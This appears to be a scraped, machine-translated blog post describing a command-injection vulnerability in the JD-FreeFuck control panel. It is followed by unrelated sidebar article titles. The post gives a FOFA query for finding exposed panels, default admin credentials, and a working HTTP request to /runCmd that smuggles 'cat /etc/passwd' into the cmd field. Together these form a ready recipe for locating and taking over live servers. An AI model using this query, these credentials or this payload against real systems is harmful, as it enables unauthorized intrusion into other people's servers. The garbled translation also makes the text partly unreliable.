当前位置:网站首页>Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck
Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck
2022-04-23 18:05:00 【Solitaire et paresseux】
Description de la vulnérabilité
i
JD-FreeFuck Une vulnérabilité d'exécution de commandes de fond existe,Parce que le contenu n'a pas été filtré lors de l'exécution de la commande,Permet d'exécuter n'importe quelle commande,Serveur de contrôle Adresse du projet: https://github.com/meselson/JD-FreeFuck
Impact de la vulnérabilité
s
JD-FreeFuck
Cartographie spatiale
d
FOFA:title="Panneau de commande en laine Jingdong"
Replay of vulnerability
- La page de connexion après la visite est la suivante
- Numéro de compte par défaut
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
Blogs personnels
Solitaire et paresseux:https://gylq.gitee.io/time
版权声明
本文为[Solitaire et paresseux]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html
边栏推荐
- [UDS unified diagnostic service] (Supplement) v. detailed explanation of ECU bootloader development points (2)
- word frequency count
- Scikit learn sklearn 0.18 official document Chinese version
- Tensorflow tensor introduction
- ES6
- Build openstack platform
- Correct opening method of option
- Rust: how to implement a thread pool?
- 2022 Jiangxi energy storage technology exhibition, China Battery exhibition, power battery exhibition and fuel cell Exhibition
- Docker 安装 MySQL
猜你喜欢
Fashion classification case based on keras
Docker 安裝 Redis
深度学习经典网络解析目标检测篇(一):R-CNN
Docker 安装 Redis
Qtablewidget usage explanation
positioner
解决报错max virtual memory areas vm.max_map_count [65530] is too low, increase to at least [262144]
C1 notes [task training part 2]
Nat commun | current progress and open challenges of applied deep learning in Bioscience
Install pyshp Library
随机推荐
C language loop structure program
Nanotechnology + AI enabled proteomics | Luomi life technology completed nearly ten million US dollars of financing
C# 网络相关操作
mysql自动启动设置用Systemctl start mysqld启动
Reptile efficiency improvement method
Dock installation redis
Implement a simple function to calculate the sum of all integers between M ~ n (m < n)
Nodejs安装
journal
7-21 wrong questions involve knowledge points.
An example of linear regression based on tensorflow
2022江西储能技术展会,中国电池展,动力电池展,燃料电池展
Random number generation of C #
Rust: how to match a string?
k8s之实现redis一主多从动态扩缩容
SSD硬盘SATA接口和M.2接口区别(详细)总结
positioner
Welcome to the markdown editor
Process management command
[UDS unified diagnostic service] (Supplement) v. detailed explanation of ECU bootloader development points (1)